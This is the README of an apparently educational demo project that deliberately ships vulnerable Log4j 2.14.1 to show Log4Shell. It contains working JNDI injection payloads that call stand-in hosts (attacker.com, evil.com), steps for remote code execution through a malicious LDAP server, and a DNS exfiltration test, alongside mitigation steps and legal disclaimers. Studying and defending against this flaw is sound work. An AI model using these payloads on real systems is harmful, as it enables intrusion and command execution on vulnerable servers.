## https://sploitus.com/exploit?id=427C0948-563D-5EB2-A575-FFD85C778305
# Log4j2-BugMaker
## CVE-2021-44228 Log4Shell Vulnerability Demonstration Project
This is a demonstration project designed for learning and researching Log4j2โs remote code execution vulnerabilities (Log4Shell). ## โ ๏ธ Safety Warning
**This project is intended solely for safety research and educational purposes. Do not use it in a production environment!**
This project uses Log4j 2.14.1, which has serious security vulnerabilities. ## ๐ Environment Configuration
- **Spring Boot**: 2.6.1
- **Log4j2**: 2.14.1 (vulnerable version)
- **Java**: 8 (JDK 1.8)
## ๐ Quick Start
### 1. Compile the project
```bash
./mvnw clean package
```
### 2. Run the application
```bash
./mvnw spring-boot:run
```
Or:
```bash
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar
```
### 3. Access the application
Open a browser and visit: http://localhost:8080
## ๐ฏ Vulnerability Endpoints
### 1. User-Agent Header Injection
```bash
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log
```
### 2. Query Parameter Injection
```bash
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a)"
```
### 3. Health Check (No Vulnerabilities)
```bash
curl http://localhost:8080/api/health
```
## ๐ก Vulnerability Mechanism
Log4Shell (CVE-2021-44228) is a serious vulnerability in Apache Log4j2. When an application records user input containing special format strings, Log4j2 parses JNDI lookup expressions, allowing attackers to execute remote code. ### Attack Vector Examples
```
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}
```
### Test Vectors (Safe)
```
${java:version}
${java:os}
${env:PATH}
```
## ๐ง Testing Steps
1. Start the application.
2. Send requests containing JNDI expressions.
3. Review console logs to observe Log4j2โs parsing behavior.
## ๐ก๏ธ Fixing Solutions
### Solution 1: Upgrade Log4j2 Version
Upgrade Log4j2 to version 2.17.1 or higher:
```xml
2.17.1
```
### Solution 2: Set JVM Parameters
```bash
-Dlog4j2.formatMsgNoLookups=true
```
### Solution 3: Remove the JndiLookup Class
```bash
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```
## ๐ Remote Code Execution Demonstration
### Method 1: Using the provided tools (Recommended)
```bash
# 1. Run the automated script
./setup-exploit-server.sh
# 2. Select the JNDI-Injection-Exploit tool
# 3. Enter the command to execute (e.g., whoami or cat /etc/hosts)
# 4. Send the attack payload in another terminal
```
### Method 2: Using a Python LDAP Server
```bash
# Start the malicious LDAP server
python3 simple-ldap-server.py "whoami"
# Or execute other commands
python3 simple-ldap-server.py "cat /etc/hosts"
# Send the attack payload in another terminal
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log
```
### Method 3: DNS Exfiltration (No Server Required)
```bash
# Run the DNS exfiltration test script
./test-dns-exfiltration.sh
# Follow instructions to access dnslog.cn and obtain a subdomain name
# Then check if DNS query requests are received
```
## ๐ References
- [Details of CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
- [Apache Log4j Security Bulletin](https://logging.apache.org/log4j/2.x/security.html)
- [CISA Warning](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a)
- [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [JNDIExploit](https://github.com/feihong-cs/JNDIExploit)
## ๐ License
This project is open source under the [MIT License](LICENSE). **Note:** This project is intended solely for educational and security research purposes. Users must bear the risks associated with its use. ## โ ๏ธ Legal Statement
Unauthorized penetration testing of other systems is illegal! This project is used only for:
- Learning in your own testing environment
- Authorized security testing
- Security research and educational purposes
Please comply with local laws and use this knowledge responsibly.
[source-iocs-preserved url=http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}]